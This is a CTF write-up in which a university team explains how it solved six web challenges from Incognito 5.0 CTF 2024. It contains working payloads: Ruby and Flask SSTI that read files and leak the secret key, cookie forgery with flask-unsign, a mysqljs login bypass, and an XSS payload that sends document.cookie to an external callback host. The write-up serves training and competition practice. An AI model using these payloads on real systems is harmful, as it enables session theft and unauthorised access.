# Description
Recently our team HCS (Heroes Cyber Security) as official Cybersecurity Community from Institut Teknologi Sepuluh Nopember has participated on Incognito 5.0 CTF 2024.
We managed to secured 1st place of 275 teams, thank you for my mentor @daffainfo who's had participate with me to solve the challenge.
[toc]
# Warmup
> You can express your fondness for the poem by the statesman by telling the server that you loved it.
http://statesman.ictf5.ninja/
## TL;DR
View-source at `/src/App.jsx` to get the flag.
## Solve
Got the website like this.
We try to inspect and search the flag from every source code, and we found the flag
```
ictf{wElc0Me_T0_1ctf}
```
# Roleplay
> Guess what you're about to play with?
http://keyboard-roleplay.ictf5.ninja
## TL;DR
View-source on the website for get the flag.
## Solve
Got a website like this.
View-source it and we had js file goes to `/static/js/bundle.js`, and we got the flag.
```
ictf{R0l3_Play3r_G0t_P0w3r}
```
# Embed flow
> This guy wants you to guess his favorite programming language, but missed setting up the pattern correctly.
http://embed-flow.ictf5.ninja/
## TL;DR
Bypass SSTI filter `^[0-9a-z\n ]+$/i` on Ruby SSTI
## Solve
When i try to send payload `{{7*7}}` we got a response like this.
After that we found a writeup that's has same filter [SSTI Bypass Filter ](https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def).
Well according to the write up, we need to encode it to URL Encode.
```
test%0A%3C%25%3D%203%20%2A%203%20%25%3E%0Atest
```
And it works!
Next, we make a payload that read the flag on server.
```
test%0A%3C%25%3D%20File%2Eopen%28%27flag%2Etxt%27%29%2Eread%20%25%3E%0Atest
```
And we got the flag.
```
ictf{ruby_r3g3x_n3w_l1n3_4l3rt}
```
# Ssssteal
> A beginner developer has designed a note-taking website to test their coding skills. Could you explore its features to assess its security posture?
http://ssssteal.ictf5.ninja/
## TL;DR
Bug chaining from SSTI with IDOR.
## Solve
Got a website like this.
Then, i try to register with username `test+{{7*7}}` and it's vulnerable to SSTI at the user dashboard.
I create some post to find the another endpoint, and the post ID's make curious if the website was vulnerable to IDOR.
Try to change the ID.
After i look at the cookie request, obviously we can use `flask-unsign` for change the cookie.
And for my conclusion, we can just get the secret key with `{{config}}` and sign the new cookie.
Then, i created new account for get the secret key.
Use `flask-unsign` to sign the new cookie.
Paste on the request, and we got the flag.
```
ictf{J1nj4_J0y_R1d3_W1th_C00k13s}
```
# Xssplode
> This seems to be a secure method for sanitizing user inputs and then passing through eval.
http://xssplode.ictf5.ninja/
## TL;DR
Escape json to XSS, send to callback website for get the flag.
## Solve
Got a website like this.
According to the title, we sure just need escape from the json and make the xss fired.
And we able to escape the json like this.
The xss is fired, but i don't know why `webhook` is not working then i use alternative for callback using `interactsh`.
```
<img src=x onerror=location.href='//mqpeejstumljrxrvzclxdmxcygrho766f.oast.fun/?x='+document.cookie>
```
Send the payload to server.
And got the flag.
```
ictf{4dm1n_kn3w_h0w_t0_c0mm3n7}
```
# CatExpress
> The cat believed she created a secure login page for her owner. But did she?
http://catexpress.ictf5.ninja/
## TL;DR
Unseen SQL Injetion on mysqljs / NodeJS.
## Solve
Source.js:
```js=1
const express = require("express");
const bodyParser = require("body-parser");
const createConnectionWithRetry = require("./db");
const app = express();
const port = 80;
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static("public"));
async function startServer() {
try {
const connection = await createConnectionWithRetry();
app.get("/", (req, res) => {
res.sendFile(__dirname + "/index.html");
});
app.get("/login", (req, res) => {
res.sendFile(__dirname + "/login.html");
});
app.post("/auth", function (request, response) {
var username = request.body.username;
var password = request.body.password;
if (username && password) {
connection.query(
"SELECT * FROM accounts WHERE username = ? AND password = ?",
[username, password],
function (error, results, fields) {
if (error) {
console.error("Error occurred:", error);
return response.status(500).send("Internal server error");
}
if (results.length > 0) {
response.redirect("/?message=ictf{f4k3_fl4g}");
} else {
response.redirect("/?message=Invalid%20credentials");
}
},
);
} else {
response.send("Please enter Username and Password!");
}
});
app.listen(port, () => {
console.log(`Server running at http://localhost:${port}/`);
});
} catch (error) {
console.error("Failed to start the server:", error);
}
}
startServer();
```
We got a login form.
At the first, we try many payload that can maybe trigger the error but it's not works.
And we find some interesting writeup about SQL Injection, it's called [Unseen SQL Injection](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4).
Well this is also my first time hear it too lol :joy:
At the code snippet it's very similar with the chall source code at line `22 - 27`.
According to the writeup, the attacker can bypass it using payload `password[password]=1`.
After that, we try that one with using this payload
```
username[username]=1&password[password]=1
```
And we got the flag.
```
ictf{c4t_w4s_w4171ng_f0r_y0u}
```
Sign in with Wallet
Connect another wallet